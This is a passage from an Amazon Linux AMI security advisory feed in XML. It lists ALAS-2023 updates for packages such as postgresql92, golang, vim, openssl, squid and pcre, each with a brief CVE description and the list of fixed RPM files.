</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28450" title="" id="CVE-2023-28450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq" version="2.76" release="16.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.76-16.17.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.76-16.17.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="16.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.76-16.17.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="16.17.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.76-16.17.amzn1.i686.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.17.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.76-16.17.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="16.17.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.76-16.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1759</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1759: important priority package update for postgresql92</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2454:
This enabled an attacker having database-level CREATE privilege to execute arbitrary code as the bootstrap superuser. Database owners have that right by default, and explicit grants may extend it to other users.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2454" title="" id="CVE-2023-2454" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-docs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1760</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1760: important priority package update for golang</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29400:
html/template: improper handling of empty HTML attributes.
Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input could result in output that would have unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.
CVE-2023-24540:
html/template: improper handling of JavaScript whitespace.
Not all valid JavaScript whitespace characters were considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.
CVE-2023-24539:
html/template: improper sanitization of CSS values
Angle brackets (<>) were not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separated by a '/' character could result in unexpectedly closing the CSS context and allowing for injection of unexpected HMTL, if executed with untrusted input.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24539" title="" id="CVE-2023-24539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24540" title="" id="CVE-2023-24540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29400" title="" id="CVE-2023-29400" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.18.6-1.44.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.44.amzn1.i686.rpm</filename></package><package name="golang" version="1.18.6" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1761</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1761: important priority package update for vim</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2610:
Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1532.
CVE-2023-2609:
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1531.
CVE-2023-2426:
Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 9.0.1499.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2426" title="" id="CVE-2023-2426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2609" title="" id="CVE-2023-2609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2610" title="" id="CVE-2023-2610" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-data" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1587-1.79.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1587-1.79.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1587-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1762</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1762: medium priority package update for openssl</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2650:
Issue summary: Processing some specially crafted ASN.1 object identifiers or
data containing them may be very slow.
Impact summary: Applications that use OBJ_obj2txt() directly, or use any of
the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message
size limit may experience notable to very long delays when processing those
messages, which may lead to a Denial of Service.
An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -
most of which have no size limit. OBJ_obj2txt() may be used to translate
an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL
type ASN1_OBJECT) to its canonical numeric text form, which are the
sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by
periods.
When one of the sub-identifiers in the OBJECT IDENTIFIER is very large
(these are sizes that are seen as absurdly large, taking up tens or hundreds
of KiBs), the translation to a decimal number in text may take a very long
time. The time complexity is O(n^2) with 'n' being the size of the
sub-identifiers in bytes (*).
With OpenSSL 3.0, support to fetch cryptographic algorithms using names /
identifiers in string form was introduced. This includes using OBJECT
IDENTIFIERs in canonical numeric text form as identifiers for fetching
algorithms.
Such OBJECT IDENTIFIERs may be received through the ASN.1 structure
AlgorithmIdentifier, which is commonly used in multiple protocols to specify
what cryptographic algorithm should be used to sign or verify, encrypt or
decrypt, or digest passed data.
Applications that call OBJ_obj2txt() directly with untrusted data are
affected, with any version of OpenSSL. If the use is for the mere purpose
of display, the severity is considered low.
In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,
CMS, CMP/CRMF or TS. It also impacts anything that processes X.509
certificates, including simple things like verifying its signature.
The impact on TLS is relatively low, because all versions of OpenSSL have a
100KiB limit on the peer's certificate chain. Additionally, this only
impacts clients, or servers that have explicitly enabled client
authentication.
In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,
such as X.509 certificates. This is assumed to not happen in such a way
that it would cause a Denial of Service, so these versions are considered
not affected by this issue in such a way that it would be cause for concern,
and the severity is therefore considered low.
CVE-2023-0466:
The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does not enable the check which allows certificates with invalid or incorrect policies to pass the certificate verification. As suddenly enabling the policy check could break existing deployments it was decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() function. Instead the applications that require OpenSSL to perform certificate policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not commonly used by applications.
CVE-2023-0465:
Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by OpenSSL and other certificate policy checks are skipped for that certificate. A malicious CA could use this to deliberately assert invalid certificate policies in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.
CVE-2023-0464:
A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this vulnerability by creating a malicious certificate chain that triggers exponential use of computational resources, leading to a denial-of-service (DoS) attack on affected systems. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464" title="" id="CVE-2023-0464" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465" title="" id="CVE-2023-0465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466" title="" id="CVE-2023-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650" title="" id="CVE-2023-2650" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.163.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1763</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1763: medium priority package update for mod_security</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48279:
In ModSecurity before 2.9.6 and 3.x before 3.0.8, HTTP multipart requests were incorrectly parsed and could bypass the Web Application Firewall. NOTE: this is related to CVE-2022-39956 but can be considered independent changes to the ModSecurity (C language) codebase.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48279" title="" id="CVE-2022-48279" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mod_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-debuginfo-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mod_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mod_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-debuginfo-2.8.0-5.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1764</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1764: medium priority package update for freetype</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-27406:
A segmentation fault was found in FreeType's FT_Request_Size() function in the ftobjs.c file. This flaw allows an attacker to access a memory location in a way that could cause an application to halt or crash, leading to a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27406" title="" id="CVE-2022-27406" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-19.16.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-19.16.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-19.16.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-19.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1765</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1765: medium priority package update for mod24_auth_mellon</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3639:
A flaw was found in mod_auth_mellon where it does not sanitize logout URLs properly. This issue could be used by an attacker to facilitate phishing attacks by tricking users into visiting a trusted web application URL that redirects to an external and potentially malicious server. The highest threat from this liability is to confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3639" title="" id="CVE-2021-3639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.10.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.10.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.14.0-2.10.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.10.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.14.0-2.10.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1766</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1766: important priority package update for squid</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8517:
An issue was discovered in Squid before 4.10. Due to incorrect input validation, the NTLM authentication credentials parser in ext_lm_group_acl may write to memory outside the credentials buffer. On systems with memory access protections, this can result in the helper process being terminated unexpectedly. This leads to the Squid process also terminating and a denial of service for all clients using the proxy.
CVE-2016-10003:
Incorrect HTTP Request header comparison in Squid HTTP Proxy 3.5.0.1 through 3.5.22, and 4.0.1 through 4.0.16 results in Collapsed Forwarding feature mistakenly identifying some private responses as being suitable for delivery to multiple clients.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10003" title="" id="CVE-2016-10003" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8517" title="" id="CVE-2020-8517" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.48.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.48.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.48.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.48.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.48.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.48.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.48.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.48.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.48.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.48.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.48.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1767</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1767: medium priority package update for pcre</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8394:
PCRE before 8.38 mishandles the (?(<digits>) and (?(R<digits>) conditions, which allows remote attackers to cause a denial of service (integer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-8390:
PCRE before 8.38 mishandles the [: and \ substrings in character classes, which allows remote attackers to cause a denial of service (uninitialized memory read) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-5073:
Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5073" title="" id="CVE-2015-5073" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8390" title="" id="CVE-2015-8390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8394" title="" id="CVE-2015-8394" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pcre" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-devel-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-static-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-debuginfo-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-tools-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" 